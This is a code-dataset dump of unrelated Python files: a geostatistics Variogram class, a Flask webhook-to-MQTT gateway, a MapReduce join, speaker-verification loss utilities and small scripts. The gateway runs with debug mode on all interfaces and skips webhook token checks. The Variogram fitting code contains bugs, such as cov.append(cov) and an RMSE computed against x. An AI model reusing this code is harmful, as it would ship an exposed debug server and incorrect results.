'even bin':\n self.bm_func = binify_even_bin\n else:\n raise ValueError(\"how has to be a callable or one of ['even width', 'even bin']\")\n\n def clone(self):\n \"\"\"\n Wrapper for copy.deepcopy function of self.\n \"\"\"\n return copy.deepcopy(self)\n\n def set_dm(self, dm=None, **kwargs):\n \"\"\"\n calculates the distance matrix if needed and sets it as a static attribute self._dm.\n\n \"\"\"\n # update kwargs\n self._dm_kwargs.update(kwargs)\n\n if dm is None:\n self._dm = self.dm_func(self._X, **self._dm_kwargs)\n if hasattr(self, '_bm'):\n self.set_bm()\n else:\n self._dm = dm\n\n @property\n def dm(self):\n \"\"\"\n Return the distance matrix, this variogram instance is using.\n In case a static distance matrix self._dm was set before, this will be returned.\n Otherwise a distance matrix will be calculated using the function self.dm_func along with the\n keyword arguments self._dm_kwargs.\n\n :return: distance matrix, like returned by :func:`scipy.spatial.squareform`\n \"\"\"\n if hasattr(self, '_dm'):\n return self._dm\n else:\n return self.dm_func(self._X, **self._dm_kwargs)\n\n\n def set_bm(self, bm=None, maxlag=None, **kwargs):\n \"\"\"\n Calculate a static binning matrix on the basis of the distance matrix self.dm. Will be set as\n attribute self._bm.\n Whenever a new binning matrix is set, the self.bin_widths attribute gets updated.\n\n :return:\n \"\"\"\n # overwrite maxlag\n if maxlag is not None:\n if maxlag < 1:\n self.__maxlag = maxlag * np.max(self.dm)\n else:\n self._maxlag = maxlag\n\n # store the bm_kwargs\n self._bm_kwargs.update(kwargs)\n\n if bm is None:\n self._bm, self.bin_widths = self.bm_func(X=self._X, dm=self.dm, maxlag=self.maxlag, **self._bm_kwargs)\n else:\n if hasattr(self, 'bin_widths'):\n delattr(self, 'bin_widths')\n self._bm = bm\n\n @property\n def bm(self):\n \"\"\"\n Return the binning matrix, this variogram instance is using.\n In case a static binning matrix self._bm was set before, this will be returned.\n Otherwise a binning matrix will be calculated using the function self.bm_func along with the\n keyword arguments self._bm_kwargs.\n The binning matrix will assign for each point pair the corresponding bin. By setting a custom\n bin matrix unsing Variogram.set_bm, you can also implement non-regular bins.\n\n :return: binning matrix in the style of :func:`scipy.spatial.squareform`\n \"\"\"\n if hasattr(self, '_bm'):\n return self._bm\n else:\n _bm, self.bin_widths = self.bm_func(X=self._X, dm=self.dm, maxlag=self.maxlag, **self._bm_kwargs)\n return _bm\n\n @property\n def maxlag(self):\n return self._maxlag\n\n @maxlag.setter\n def maxlag(self, value):\n # a maxlag was set, therefore the _bm and bin_widths attributes have to be cleared\n if hasattr(self, '_bm'):\n delattr(self, '_bm')\n if hasattr(self, 'bin_widths'):\n delattr(self, 'bin_widths')\n\n # set new maxlag\n if value is None:\n self._maxlag = None\n elif value < 1:\n self._maxlag = value * np.max(self.dm)\n else:\n self._maxlag = value\n\n @property\n def experimental(self):\n \"\"\"\n :return: experimental variogram as a numpy.ndarray.\n \"\"\"\n # group the values to bins and apply the estimator\n _g = self.grouped_pairs\n\n # apply\n return np.array(self._estimator(_g))\n\n @property\n def grouped_pairs(self):\n \"\"\"\n Result of the group_to_bin function. This property will be used for wrapping the function, in case there are\n alternative grouping functions implemented one day.\n\n :return:\n \"\"\"\n if self.is_directional:\n return group_to_bin(self.values, self.bm, X=self._X, azimuth_deg=self.azimuth, tolerance=self.tolerance,\n maxlag=self.maxlag)\n else:\n return group_to_bin(self.values, self.bm, maxlag=self.maxlag)\n\n\n def fit(self, x, y):\n \"\"\"\n Fit the theoretical variogram function to the experimental values. The function will be fitted using the least\n square method, with a maximum of maxiter iteration, defaults to 1000. For fitting the starting parameters of\n the theoretical function a, C0, b can be given as kwargs. If the Variogram uses a custom model, the parameters\n might have other names.\n The parameter set with best fit will be returned.\n\n THIS STUFF NEEDS A COMPLETE REWORK\n\n :return:\n \"\"\"\n # if last bin is set, delete it\n if hasattr(self, 'last_bin'):\n del self.last_bin\n\n # remove nans\n _x = x[~np.isnan(y)]\n _y = y[~np.isnan(y)]\n\n if self.fit_method == 'lm':\n# bounds = (0, [np.nanmax(x), np.nanmax(y)])\n bounds = (0, self.__get_fit_bounds(x, y))\n return curve_fit(self._model, _x, _y, p0=bounds[1], bounds=bounds)\n\n elif self.fit_method == 'pec':\n # Run the fitting with each point excluded\n rmse, cof, cov, punish = list(), list(), list(), list()\n # get the histogram counts (the cumsum of bin sizes, summed from right to left)\n _h = self.hist[~np.isnan(y)]\n h = np.flipud(np.cumsum(np.flipud(_h)))\n\n for i in range(1, len(_x) - 2):\n# bnd = (0, [np.max(_x[:-i]), np.max(_y[:-i])])\n bnd = (0, self.__get_fit_bounds(x[:-i], y[:-i]))\n cf, cv = curve_fit(self._model, _x[:-i], _y[:-i], p0=bnd[1], bounds=bnd)\n cof.append(cf)\n cov.append(cov)\n p = ((h[0] + 1) / ((h[0] + 1) - h[-i]))**self.pec_punish\n rmse.append(p * (np.sqrt(np.sum((self._model(_x[:-i], *cf) - _x[:-i]) ** 2) / len(_x[:-i]))))\n punish.append(p)\n\n if self.verbose:\n print('Punish Weights: ', ['%.3f' % _ for _ in punish])\n print('RMSE: ', ['%.2f' % _ for _ in rmse])\n # here rmse is the error for the cf set in cof\n # find the optimum of excluded points to rmse error improvement\n best_rmse = rmse.index(np.nanmin(rmse))\n self.last_bin = len(x) - (best_rmse + 1)\n\n return cof[best_rmse], cov[best_rmse]\n\n else:\n raise ValueError('The fit method {} is not understood. Use either \\'lm\\' (least squares) or \\'pec\\' (point exclusion cost).'.format(self.fit_method))\n\n\n def __get_fit_bounds(self, x, y):\n \"\"\"\n Return the bounds for parameter space in fitting a variogram model. The bounds are depended on the Model\n that is used\n\n :return:\n \"\"\"\n mname = self._model.__name__\n\n # use range, sill and smoothness parameter\n if mname == 'matern':\n # a is max(x), C0 is max(y) s is limited to 20?\n bounds = [np.nanmax(x), np.nanmax(y), 20.]\n\n # use range, sill and shape parameter\n elif mname == 'stable':\n # a is max(x), C0 is max(y) s is limited to 2?\n bounds = [np.nanmax(x), np.nanmax(y), 2.]\n\n # use only sill\n elif mname == 'nugget':\n # a is max(x):\n bounds = [np.nanmax(x)]\n\n # use range and sill\n else:\n # a is max(x), C0 is max(y)\n bounds = [np.nanmax(x), np.nanmax(y)]\n\n # if use_nugget is True add the nugget\n if self.use_nugget:\n bounds.append(0.99)\n\n return bounds\n\n @property\n def data(self):\n \"\"\"\n Calculates the experimental Variogram. As the bins are only indexed by a integer, the lag array is caculated\n by cummulative summarizing the bin_widths array. If this bin_widths was not returned by the bm_func, even bin\n widths are created matching the number of bins at the maximum entry in the distance matrix. This will lead to\n calculation errors, in case the bin widths are not even.\n The theoretical variogram function is fitted to the experimental values at given lags\n and the theoretical function is calculated for all increments and returned.\n\n :return:\n \"\"\"\n # calculate the experimental variogram\n # this might raise an exception if the bm is not present yet\n _exp = self.experimental\n _bin = self.bins\n\n # use relative or absolute bins\n if self.normalized:\n _bin /= np.nanmax(_bin) # normalize X\n _exp /= np.nanmax(_exp) # normalize Y\n x = np.linspace(0, 1, 100) # use 100 increments\n else:\n# x = np.arange(0, np.float64(np.max(_bin)), 1)\n x = np.linspace(0, np.float64(np.nanmax(_bin)), 100)\n\n # fit\n self.cof, self.cov = self.fit(_bin, _exp)\n\n return x, self._model(x, *self.cof)\n\n @property\n def residuals(self):\n \"\"\"\n\n :return:\n \"\"\"\n # get the deviations\n experimental, model = self.__model_deviations()\n\n # calculate the residuals\n return np.fromiter(map(lambda x, y: x - y, model, experimental), np.float)\n\n @property\n def mean_residual(self):\n \"\"\"\n\n :return:\n \"\"\"\n return np.nanmean(np.fromiter(map(np.abs, self.residuals), np.float))\n\n @property\n def RMSE(self):\n # get the deviations\n experimental, model = self.__model_deviations()\n\n # get the sum of squares\n rsum = np.nansum(np.fromiter(map(lambda x, y: (x - y)**2, experimental, model), np.float))\n\n return np.sqrt(rsum / len(model))\n\n @property\n def NRMSE(self):\n return self.RMSE / np.nanmean(self.experimental)\n\n @property\n def NRMSE_r(self):\n return self.RMSE / (np.nanmax(self.experimental) - np.nanmean(self.experimental))\n\n @property\n def r(self):\n \"\"\"\n Pearson correlation of the fitted Variogram\n\n :return:\n \"\"\"\n # get the experimental and theoretical variogram and cacluate means\n experimental, model = self.__model_deviations()\n mx = np.nanmean(experimental)\n my = np.nanmean(model)\n\n # claculate the single pearson correlation terms\n term1 = np.nansum(np.fromiter(map(lambda x, y: (x-mx) * (y-my), experimental, model), np.float))\n\n t2x = np.nansum(np.fromiter(map(lambda x: (x-mx)**2, experimental), np.float))\n t2y = np.nansum(np.fromiter(map(lambda y: (y-my)**2, model), np.float))\n\n return term1 / (np.sqrt(t2x * t2y))\n\n @property\n def NS(self):\n \"\"\"\n Nash Sutcliffe efficiency of the fitted Variogram\n\n :return:\n \"\"\"\n experimental, model = self.__model_deviations()\n mx = np.nanmean(experimental)\n\n # calculate the single nash-sutcliffe terms\n term1 = np.nansum(np.fromiter(map(lambda x, y: (x - y)**2, experimental, model), np.float))\n term2 = np.nansum(np.fromiter(map(lambda x: (x - mx)**2, experimental), np.float))\n\n return 1 - (term1 / term2)\n\n def __model_deviations(self):\n \"\"\"\n These model deviations can be used to calculate different model quality parameters like residuals, RMSE.\n :return:\n \"\"\"\n # get the experimental values and their bin bounds\n _exp = self.experimental\n _bin = self.bins\n\n # get the model parameters\n param = self.describe()\n if 'error' in param:\n raise RuntimeError('The Variogram cannot be applied properly. First, calculate the variogram.')\n\n # calculate the model values at bin bounds\n _model = self._model(_bin, *self.cof)\n\n return _exp, _model\n\n def describe(self):\n \"\"\"\n Return a dictionary of the Variogram parameters\n\n :return:\n \"\"\"\n try:\n if self.normalized:\n maxlag = np.nanmax(self.bins)\n maxvar = np.nanmax(self.experimental)\n else:\n maxlag = 1\n maxvar = 1\n index, data = self.data\n cof = self.cof\n except:\n return dict(name=self._model.__name__, estimator = self._estimator.__name__, error='Variogram not calculated.')\n rdict = dict(\n name=self._model.__name__,\n estimator=self._estimator.__name__,\n range=cof[0] * maxlag,\n sill=cof[1] * maxvar,\n nugget=cof[-1] * maxvar if self.use_nugget else 0\n )\n\n # handle s parameters\n if self._model.__name__ == 'matern':\n rdict['smoothness'] = cof[2]\n elif self._model.__name__ == 'stable':\n rdict['shape'] = cof[2]\n\n return rdict\n\n @property\n def parameters(self):\n \"\"\"\n Extract just the variogram parameters range, sill and nugget from the self.describe return\n\n :return:\n \"\"\"\n d = self.describe()\n if 'error' in d:\n return [None, None, None]\n elif self._model.__name__ == 'matern':\n return list([d['range'], d['sill'], d['smoothness'], d['nugget']])\n elif self._model.__name__ == 'stable':\n return list([d['range'], d['sill'], d['shape'], d['nugget']])\n elif self._model.__name__ == 'nugget':\n return list([d['nugget']])\n else:\n return list([d['range'], d['sill'], d['nugget']])\n\n @property\n def bins(self):\n \"\"\"\n Return the upper bin bounds of the experimental Variogram.\n If no self.bin_widths is set, even width bins are assumed and will be calculated from the distance matrix,\n as the maximum distance divided by the amount of bins.\n\n This will cause errors if the bins are not evenly distributed.\n\n :return:\n \"\"\"\n # do a dummy bm calculation to set actual bin widths\n # TODO: this is just a ugly workaround.\n _bm = self.bm\n\n if hasattr(self, 'bin_widths'):\n _bin = np.cumsum(self.bin_widths)\n else:\n print('Warning: Bin edges were calcuated on the fly.')\n n = int(np.max(self.bm) + 1)\n _bin = np.cumsum(np.ones(n) * np.max(self.dm) / n)\n\n return _bin\n\n @property\n def hist(self):\n \"\"\"\n Return a histogram for the present bins in the Variogram. The bin matrix bm will be unstacked and counted.\n Variogram.bins, Variogram.hist could be used to produce a properly labeled histogram.\n\n :return:\n \"\"\"\n # get the upper triangle from the bin matrix\n# _bm = self.bm\n# ut = [_bm[i, j] for i in range(len(_bm)) for j in range(len(_bm)) if j > i]\n# return np.bincount(ut)\n\n # get the grouped pairs\n _g = self.grouped_pairs\n return np.array([len(_) / 2 for _ in _g])\n\n @property\n def values1D(self):\n \"\"\"\n If the values were given with ndim > 1, the value1D property will return the aggreagtes\n using the self.agg function.\n\n :return:\n \"\"\"\n return [self.agg(_) for _ in self.values]\n\n def to_DataFrame(self):\n \"\"\"\n Return the result of the theoretical Variogram as a pandas.DataFrame. The lag will index the semivariance\n values.\n\n :return:\n \"\"\"\n index, data = self.data\n\n # translate the normalized lag to real lag\n maxlag = np.nanmax(self.bins)\n maxvar = np.nanmax(self.experimental)\n\n return DataFrame({'lag': index * maxlag, self._model.__name__: data * maxvar}).copy()\n\n\n def plot(self, axes=None, grid=True, show=True, cof=None):\n \"\"\"\n Plot the variogram, including the experimental and theoretical variogram. By default, the experimental data\n will be represented by blue points and the theoretical model by a green line.\n\n :return:\n \"\"\"\n try:\n _bin, _exp = self.bins, self.experimental\n if cof is None:\n x, data = self.data\n else:\n x = np.linspace(0, 1, 100) if self.normalized else np.linspace(0, np.nanmax(_bin), 100)\n data = self._model(x, *cof)\n _hist = self.hist\n except Exception as e:\n raise RuntimeError('A chart could not be drawn, as the input data is not complete. Please calculate the Variogram first.\\nDetailed message: %s.' % str(e))\n\n # handle the relative experimental variogram\n if self.normalized:\n _bin /= np.nanmax(_bin)\n _exp /= np.nanmax(_exp)\n\n # do the plotting\n if axes is None:\n fig = plt.figure()\n ax1 = plt.subplot2grid((5, 1), (1, 0), rowspan=4)\n ax2 = plt.subplot2grid((5, 1), (0, 0), sharex=ax1)\n fig.subplots_adjust(hspace=0)\n else:\n ax1, ax2 = axes\n fig = ax1.get_figure()\n\n # calc histgram bar width\n # bar use 70% of the axis, w is the total width divided by amount of bins in the histogram\n w = (np.max(_bin) * 0.7) / len(_hist)\n\n # plot Variograms\n\n # if last_bin is set, plot only considered bins in blue, excluded in red\n ax1.plot(_bin, _exp, '.b')\n ax1.plot(x, data, '-g')\n\n if hasattr(self, 'last_bin'):\n ax1.plot(_bin[self.last_bin:], _exp[self.last_bin:], '.r')\n\n\n # plot histogram\n ax2.bar(_bin, _hist, width=w, align='center')\n # adjust\n plt.setp(ax2.axes.get_xticklabels(), visible=False)\n ax2.axes.set_yticks(ax2.axes.get_yticks()[1:])\n\n # ax limits\n if self.normalized:\n ax1.set_xlim([0, 1.05])\n ax1.set_ylim([0, 1.05])\n\n if grid:\n ax1.vlines(_bin, *ax1.axes.get_ybound(), colors=(.85, .85, .85), linestyles='dashed')\n ax2.vlines(_bin, *ax2.axes.get_ybound(), colors=(.85, .85, .85), linestyles='dashed')\n\n # annotation\n ax1.axes.set_ylabel('semivariance (%s)' % self._estimator.__name__)\n ax1.axes.set_xlabel('Lag (-)')\n ax2.axes.set_ylabel('N')\n\n # show the figure\n if show:\n fig.show()\n\n return fig\n\n\n def scattergram(self, ax=None, plot=True):\n \"\"\"\n Plot a scattergram, which is a scatter plot of\n\n :return:\n \"\"\"\n # calculate population mean\n _mean = np.mean(self.values1D)\n\n # group the values to bins\n gbm = self.grouped_pairs\n\n # create the tail and head arrays\n tail, head = list(), list()\n\n # order the point pairs to tail and head\n for grp in gbm:\n # the even values are z(x) and odd values are z(x+h)\n for i in range(0, len(grp) - 1, 2):\n tail.append(_mean - grp[i])\n head.append(_mean - grp[i + 1])\n\n # if no plot is questioned, return tail and head arrays\n if not plot:\n return tail, head\n\n # else plot in either given Ax object or create a new one\n if ax is None:\n fig, ax = plt.subplots(1, 1)\n else:\n fig = ax.get_figure()\n\n # plot\n ax.plot(tail, head, '.k')\n\n # show the figure\n fig.show()\n\n return fig\n\n def location_trend(self, axes=None):\n \"\"\"\n Plot the values over each dimension in the coordinates as a scatter plot.\n These plots can be used to identify a correlation between the value of an observation\n and its location. If this is the case, it would violate the fundamental geostatistical\n assumption, that a oberservation is independed of its observation\n\n :param axes: list of `matplotlib.AxesSubplots`. The len has to match the dimensionality\n of the coordiantes.\n\n :return:\n \"\"\"\n N = len(self._X[0])\n if axes is None:\n # derive the needed amount of col and row\n nrow = int(round(np.sqrt(N)))\n ncol = int(np.ceil(N / nrow))\n fig, axes = plt.subplots(nrow, ncol, figsize=(ncol * 6 ,nrow * 6))\n else:\n if not len(axes) == N:\n raise ValueError('The amount of passed axes does not fit the coordinate dimensionality of %d' % N)\n fig = axes[0].get_figure()\n\n for i in range(N):\n axes.flatten()[i].plot([_[i] for _ in self._X], self.values, '.r')\n axes.flatten()[i].set_xlabel('%d-dimension' % (i + 1))\n axes.flatten()[i].set_ylabel('value')\n\n # plot the figure and return it\n plt.tight_layout()\n fig.show()\n\n return fig\n\n\n\n\n ## ----- implementing some Python functions ---- ##\n def __repr__(self):\n \"\"\"\n Textual representation of this Variogram instance.\n\n :return:\n \"\"\"\n try:\n _name = self._model.__name__\n _b = int(len(self.bins))\n except:\n return \"< abstract Variogram >\"\n return \"< %s Semivariogram fitted to %d bins >\" % (_name, _b)\n\n def __str__(self):\n \"\"\"\n Descriptive respresentation of this Variogram instance that shall give the main variogram\n parameters in a print statement.\n\n :return:\n \"\"\"\n par = self.describe()\n\n _sill = np.NaN if 'error' in par else par['sill']\n _range = np.NaN if 'error' in par else par['range']\n _nugget = np.NaN if 'error' in par else par['nugget']\n\n s = \"{0} Variogram\\n\".format(par['name'])\n s+= \"-\" * (len(s) - 1) + \"\\n\"\n s+= \"Estimator: {0}\\nRange: {1:.2f}\\nSill: {2:.2f}\\nNugget: {3:.2f}\\n\".format(par['estimator'], _range, _sill, _nugget)\n\n return s\n","sub_path":"skgstat/Variogram.py","file_name":"Variogram.py","file_ext":"py","file_size_in_byte":29993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121914084","text":"from flask import Flask\nfrom flask import json\nfrom flask import Response\nfrom flask import request\nimport os\nimport logging\nfrom mqtt import MqttClient\n\n\"\"\"Server class\"\"\"\nclass Server(object):\n\tapp = Flask(__name__)\n\tMQTTC = MqttClient()\n\n\t@app.route(\"/\", methods =['GET', 'POST'])\n\tdef Welcome():\n\t\treturn \"Welcome to my page :)\"\n\n\n\t\"\"\"webhook api\"\"\"\n\t@app.route(\"/webhook\", methods=['GET'])\n\tdef verify():\n\t\treturn request.args.get('hub.challenge')\n\n\t@app.route(\"/webhook\", methods=['POST'])\n\tdef fb_feeds_webhook():\n\t\t\"\"\"webhook api\"\"\"\n\t\tprint('Handling webhook request!!')\n\t\tcontent = request.get_json()\n\t\tif content['entry'][0]['changes'][0]['value']['item'] == 'like':\n\t\t\tmsg = {\n\t\t\t\t\"time\" \t\t: int(content['entry'][0]['time']),\n\t\t\t\t\"topic\" \t: \"LIKE\",\n\t\t\t\t\"user_id\" \t: content['entry'][0]['changes'][0]['value']['user_id']\n\t\t\t\t}\n\t\t\tServer.MQTTC.publish('Facebook', msg)\n\t\t\n\t\tprint('Handled webhook request' + str(content))\n\t\treturn ''\n\n\n\nif __name__ == '__main__':\n\tServer = Server()\n\tServer.app.debug = True\n\tServer.app.run(host = '0.0.0.0', port = int(os.environ.get(\"PORT\", 5000)))\n","sub_path":"Gateway.py","file_name":"Gateway.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79568392","text":"import MapReduce\nimport sys\n\n# Part 1\nmr = MapReduce.MapReduce()\n\n# Part 2\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[1]\n #value = record\n #words = value.split()\n mr.emit_intermediate(key, record)\n\n# Part 3\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n #total = 0\n #for v in list_of_values:\n #total += v\n #mr.emit((key, list(set(list_of_values))))\n a=[]\n b=[]\n for l in list_of_values:\n if l[0] == \"order\":\n a.append(l)\n else:\n b.append(l)\n for m in a:\n for n in b:\n x=m+n\n mr.emit(x)\n\n# Part 4\ninputdata = open(sys.argv[1])\nmr.execute(inputdata, mapper, reducer)\n\n'''\ndef locateWords(strlist):\nd = {}\nfor i, substr in enumerate(strlist):\n for word in substr.split()\n if word not in d:\n d[word] = [i]\n else:\n d[word].append(i)\nreturn d\n'''\n","sub_path":"assignment3/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531639745","text":"import librosa\r\nimport numpy as np\r\nimport torch\r\nimport torch.autograd as grad\r\nimport torch.nn.functional as F\r\n\r\nimport options as opt\r\n\r\ndef get_centroids_prior(embeddings):\r\n centroids = []\r\n for speaker in embeddings:\r\n centroid = 0\r\n for utterance in speaker:\r\n centroid = centroid + utterance\r\n centroid = centroid/len(speaker)\r\n centroids.append(centroid)\r\n centroids = torch.stack(centroids)\r\n return centroids\r\n\r\ndef get_centroids(embeddings):\r\n centroids = embeddings.mean(dim=1)\r\n return centroids\r\n\r\ndef get_centroid(embeddings, speaker_num, utterance_num):\r\n centroid = 0\r\n for utterance_id, utterance in enumerate(embeddings[speaker_num]):\r\n if utterance_id == utterance_num:\r\n continue\r\n centroid = centroid + utterance\r\n centroid = centroid/(len(embeddings[speaker_num])-1)\r\n return centroid\r\n\r\ndef get_utterance_centroids(embeddings):\r\n ##(speaker_ct, utterance_per_speaker_ct, embedding_size)\r\n sum_centroids = embeddings.sum(dim=1)\r\n sum_centroids = sum_centroids.reshape(\r\n sum_centroids.shape[0], 1, sum_centroids.shape[-1])\r\n\r\n num_utterances = embeddings.shape[1] - 1\r\n centroids = (sum_centroids - embeddings) / num_utterances\r\n return centroids\r\n\r\ndef get_cossim_prior(embeddings, centroids):\r\n # Calculates cosine similarity matrix. Requires (N, M, feature) input\r\n cossim = torch.zeros(embeddings.size(0),embeddings.size(1),centroids.size(0))\r\n for speaker_num, speaker in enumerate(embeddings):\r\n for utterance_num, utterance in enumerate(speaker):\r\n for centroid_num, centroid in enumerate(centroids):\r\n if speaker_num == centroid_num:\r\n centroid = get_centroid(embeddings, speaker_num, utterance_num)\r\n output = F.cosine_similarity(utterance,centroid,dim=0)+1e-6\r\n cossim[speaker_num][utterance_num][centroid_num] = output\r\n return cossim\r\n\r\ndef get_cossim(embeddings, centroids):\r\n # number of utterances per speaker\r\n num_utterances = embeddings.shape[1]\r\n utterance_centroids = get_utterance_centroids(embeddings)\r\n\r\n utterance_centroids_flat = utterance_centroids.view(\r\n utterance_centroids.shape[0] * utterance_centroids.shape[1],\r\n -1)\r\n embeddings_flat = embeddings.view(\r\n embeddings.shape[0] * num_utterances,\r\n -1)\r\n \r\n cos_same = F.cosine_similarity(embeddings_flat, utterance_centroids_flat)\r\n\r\n centroids_expand = centroids.repeat((num_utterances * embeddings.shape[0], 1))\r\n embeddings_expand = embeddings_flat.unsqueeze(1).repeat(1, embeddings.shape[0], 1)\r\n embeddings_expand = embeddings_expand.view(\r\n embeddings_expand.shape[0] * embeddings_expand.shape[1],\r\n embeddings_expand.shape[-1]\r\n )\r\n cos_diff = F.cosine_similarity(embeddings_expand, centroids_expand)\r\n cos_diff = cos_diff.view(\r\n embeddings.size(0),\r\n num_utterances,\r\n centroids.size(0)\r\n )\r\n # assign the cosine distance for same speakers to the proper idx\r\n same_idx = list(range(embeddings.size(0)))\r\n cos_diff[same_idx, :, same_idx] = cos_same.view(embeddings.shape[0], num_utterances)\r\n cos_diff = cos_diff + 1e-6\r\n return cos_diff\r\n\r\ndef calc_loss_prior(sim_matrix):\r\n # Calculates loss from (N, M, K) similarity matrix\r\n per_embedding_loss = torch.zeros(sim_matrix.size(0), sim_matrix.size(1))\r\n for j in range(len(sim_matrix)):\r\n for i in range(sim_matrix.size(1)):\r\n per_embedding_loss[j][i] = -(sim_matrix[j][i][j] - ((torch.exp(sim_matrix[j][i]).sum()+1e-6).log_()))\r\n loss = per_embedding_loss.sum() \r\n return loss, per_embedding_loss\r\n\r\ndef calc_loss(sim_matrix):\r\n same_idx = list(range(sim_matrix.size(0)))\r\n pos = sim_matrix[same_idx, :, same_idx]\r\n neg = (torch.exp(sim_matrix).sum(dim=2) + 1e-6).log_()\r\n per_embedding_loss = -1 * (pos - neg)\r\n loss = per_embedding_loss.sum()\r\n return loss, per_embedding_loss\r\n\r\ndef normalize_0_1(values, max_value, min_value):\r\n normalized = np.clip((values - min_value) / (max_value - min_value), 0, 1)\r\n return normalized\r\n\r\ndef mfccs_and_spec(wav_file, wav_process = False, calc_mfccs=False, calc_mag_db=False): \r\n sound_file, _ = librosa.core.load(wav_file, sr=opt.sr)\r\n if len(sound_file) ==0:\r\n print(wav_file, len(sound_file), int(opt.window*opt.sr))\r\n window_length = int(opt.window * opt.sr)\r\n hop_length = int(opt.hop * opt.sr)\r\n duration = opt.tisv_frame * opt.hop + opt.window\r\n \r\n # Cut silence and fix length\r\n if wav_process == True:\r\n sound_file, index = librosa.effects.trim(sound_file, top_db=60, frame_length=window_length, hop_length=hop_length)\r\n length = int(opt.sr * duration)\r\n sound_file = librosa.util.fix_length(sound_file, length)\r\n \r\n spec = librosa.stft(sound_file, n_fft=opt.nfft, hop_length=hop_length, win_length=window_length)\r\n mag_spec = np.abs(spec)\r\n \r\n mel_basis = librosa.filters.mel(opt.sr, opt.nfft, n_mels=opt.nmels)\r\n mel_spec = np.dot(mel_basis, mag_spec)\r\n \r\n mag_db = librosa.amplitude_to_db(mag_spec)\r\n #db mel spectrogram\r\n mel_db = librosa.amplitude_to_db(mel_spec).T\r\n \r\n mfccs = None\r\n if calc_mfccs:\r\n mfccs = np.dot(librosa.filters.dct(40, mel_db.shape[0]), mel_db).T\r\n \r\n #print(mel_db.size())\r\n return mfccs, mel_db, mag_db\r\n\r\nif __name__ == \"__main__\":\r\n w = grad.Variable(torch.tensor(1.0))\r\n b = grad.Variable(torch.tensor(0.0))\r\n embeddings = torch.tensor([[0,1,0],[0,0,1], [0,1,0], [0,1,0], [1,0,0], [1,0,0]]).to(torch.float).reshape(3,2,3)\r\n centroids = get_centroids(embeddings)\r\n cossim = get_cossim(embeddings, centroids)\r\n sim_matrix = w*cossim + b\r\n loss, per_embedding_loss = calc_loss(sim_matrix)\r\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175424812","text":"import urllib.request\r\n\r\ndef read_text():\r\n quotes = open(\"words.txt\")\r\n contents_of_files = quotes.read()\r\n print(contents_of_files)\r\n quotes.close()\r\n check_profanity(contents_of_files)\r\n\r\ndef check_profanity(text_to_check):\r\n print(text_to_check)\r\n connection = urllib.request.urlopen(\"http://www.wdylike.appspot.com/?q=\"+text_to_check)\r\n output = connection.read().decode('utf-8')\r\n print(output)\r\n connection.close()\r\n if(\"true\" in output): \r\n print(\"Documento possui um palavrão!\")\r\n elif(\"false\" in output):\r\n print(\"Documento não possui palavrão!\")\r\n else:\r\n print(\"não foi possivel verificar o documento!\")\r\n\r\nread_text()\r\n\r\n\r\n\r\n\"\"\"\r\nwith urllib.request.urlopen('http://python.org/') as response:\r\n html = response.read()\r\n print(html)\r\n\"\"\"\r\n","sub_path":"check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314020800","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom .views import (\n IndexView, ContactView, AttorneyView,\n PracticeAnchorView, AboutView, JobView,\n PortfolioView\n)\n\nurlpatterns = [\n url(r'^$', IndexView.as_view(), name='index'),\n url(r'^contato/$', ContactView.as_view(), name='contact'),\n url(r'^advogados/$', AttorneyView.as_view(), name='attorneys'),\n url(r'^quem-somos/$', AboutView.as_view(), name='about'),\n url(r'^trabalhe-conosco/$', JobView.as_view(), name='job'),\n url(r'^portfolio/$', PortfolioView.as_view(), name='portfolio'),\n url(r'^areas-de-atuacao/$', PracticeAnchorView.as_view(), name='practice_anchor'),\n]\n","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645932446","text":"from sentiment.tass import InterTASSReader\nimport os\nfrom collections import Counter, defaultdict as dc\nfrom pprint import pprint\n\ncategories = [\"CR\", \"ES\", \"PE\"]\nroot_path = \"InterTASS\"\nsuffix = \"train-tagged.xml\"\n\n\ndef count_tweets(path):\n reader = InterTASSReader(path)\n dist = Counter(reader.y())\n return dict(dist), sum(dist.values())\n\n\ndef corpus_statistics(root_path, categories):\n statistics = dc(dict)\n for category in categories:\n path = os.path.join(root_path, category)\n for corpus in os.listdir(path):\n if corpus.endswith(suffix):\n statistics[category], statistics[category][\"total\"] = \\\n count_tweets(os.path.join(path, corpus))\n return dict(statistics)\n\n\nif __name__ == '__main__':\n pprint(corpus_statistics(root_path, categories))\n","sub_path":"sentiment/scripts/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"76913313","text":"import numpy as np\n\nx = np.array([range(100), range(311,411)])\ny = np.array([range(501,601), range(711,811)])\n\nx=np.transpose(x)\ny=np.transpose(y)\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(\n x,y, random_state = 66, test_size = 0.4 # test_size = 0.4: 40% 씩 짜른다.\n)\nx_test, x_val, y_test, y_val = train_test_split(\n x_test, y_test, random_state = 66, test_size = 0.5\n)\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nmodel = Sequential()\n\n# 모델 구성\n# model.add(Dense(100, input_dim = 1, activation = 'relu'))\nmodel.add(Dense(100, input_shape = (2,), activation = 'relu'))\nmodel.add(Dense(50))\nmodel.add(Dense(25))\nmodel.add(Dense(5))\nmodel.add(Dense(2))\n\nmodel.summary()\n\n# 훈련\nmodel.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\nmodel.fit(x_train, y_train,epochs = 100, 